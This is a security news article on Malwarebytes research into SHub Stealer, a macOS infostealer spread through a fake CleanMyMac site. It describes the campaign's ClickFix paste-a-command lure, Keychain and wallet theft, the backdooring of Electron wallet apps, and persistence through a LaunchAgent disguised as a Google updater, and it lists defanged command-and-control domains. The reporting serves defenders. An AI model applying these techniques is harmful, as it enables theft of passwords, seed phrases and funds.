A malicious website posing as the popular Mac utility CleanMyMac is distributing a sophisticated macOS infostealer that harvests passwords, browser data and cryptocurrency wallet credentials. Security researchers say the malware, known as SHub Stealer, also installs hidden backdoors in crypto wallet applications to continuously siphon sensitive data.
A Deceptive Website Delivering Malware
A convincing fake website impersonating the well-known Mac utility CleanMyMac is actively distributing a dangerous macOS malware known as SHub Stealer, according to cybersecurity researchers. The site, hosted at cleanmymacos[.]org, has no affiliation with the legitimate CleanMyMac software or its developer, MacPaw.
The malware campaign relies on a social-engineering technique known as ClickFix, which manipulates visitors into opening the macOS Terminal and pasting what appears to be a legitimate installation command. In reality, the command initiates a hidden download and execution of malicious code.
The command itself is designed to appear credible. It prints a fake MacPaw link to create the illusion of legitimacy, decodes a concealed base64-encoded URL that masks the true destination, and then downloads and runs a malicious shell script from the attacker’s server.
Because the victim executes the command manually, many of macOS’s built-in security protections — including Gatekeeper, XProtect, and notarization checks — offer little resistance. The malware then installs itself silently within the system.
Data Harvesting and Command-and-Control Infrastructure
Once installed, SHub Stealer begins harvesting a wide range of sensitive data. Researchers say the malware collects saved passwords, browser information, Apple Keychain contents, cryptocurrency wallet files and Telegram session data.
Machines infected by the malware transmit identifying details — including IP address, macOS version and hostname — to a command-and-control server located at res2erch-sl0ut[.]com.
Security analysts note that SHub belongs to a broader family of AppleScript-based macOS infostealers, a category that also includes malware strains such as MacSync Stealer and Odyssey Stealer.
Researchers also identified a geofencing feature embedded in the malware. Before executing its primary payload, a loader script checks whether the infected machine has a Russian-language keyboard installed. If it does, the malware signals the attacker’s server with a “cis_blocked” event and exits without collecting data.
This behavior is commonly seen in malware associated with Russian-speaking cybercriminal groups, which often avoid infecting systems located within Commonwealth of Independent States countries to reduce the risk of attention from local authorities.
Backdooring Cryptocurrency Wallet Applications
What distinguishes SHub Stealer from related malware families, researchers say, is its ability to modify installed cryptocurrency wallet applications.
If the malware detects certain wallet programs on the infected Mac, it silently replaces critical application files with modified versions that continue to function normally while secretly transmitting sensitive data to the attacker.
The five confirmed targets are Exodus, Atomic Wallet, Ledger Wallet, Ledger Live, and Trezor Suite, all of which are desktop applications built using the Electron framework.
Electron-based applications store much of their operational logic inside a file called app.asar. SHub terminates the running wallet application, downloads a modified version of this file from its command-and-control infrastructure, overwrites the original and then re-signs the application so macOS accepts the altered software.
The modified applications continue to operate normally from the user’s perspective but secretly extract credentials in the background.
In the case of Exodus and Atomic Wallet, the malware sends the user’s wallet password and seed phrase to the endpoint wallets-gate[.]io/api/injection each time the wallet is unlocked.
Fake Interfaces and Persistent Access
The malware employs additional deception techniques to extract sensitive recovery information from users of other wallets. For Ledger Wallet and Ledger Live, SHub disables TLS validation at startup and presents a fake recovery interface that prompts the user to enter their seed phrase. The information is then transmitted to the same attacker-controlled endpoint.
For Trezor Suite, the malware displays a full-screen overlay designed to replicate the wallet’s legitimate interface. The overlay presents a fabricated security update message requesting the seed phrase. The phrase is validated locally using the application’s own BIP39 library before being sent to the attacker.
To maintain long-term access to the compromised system, SHub installs a background task disguised as a legitimate Google component. The malware creates a file named com.google.keystone.agent.plist in the directory ~/Library/LaunchAgents/, impersonating Google’s Keystone updater.
The task runs every sixty seconds, allowing the attacker to execute remote commands on the infected machine. Researchers also observed that all five compromised wallet applications transmit stolen data to the same endpoint — wallets-gate[.]io — using identical API keys and build identifiers, suggesting the activity is controlled by a single operator.
Security analysts say users who executed the malicious command should inspect their systems for the LaunchAgent file and remove suspicious components. They also advise anyone who had cryptocurrency wallets installed at the time of infection to treat their recovery seed phrases as compromised and transfer funds to a new wallet created on a clean device. The findings were reported by researchers at Malwarebytes, who analyzed the full attack chain behind the campaign.
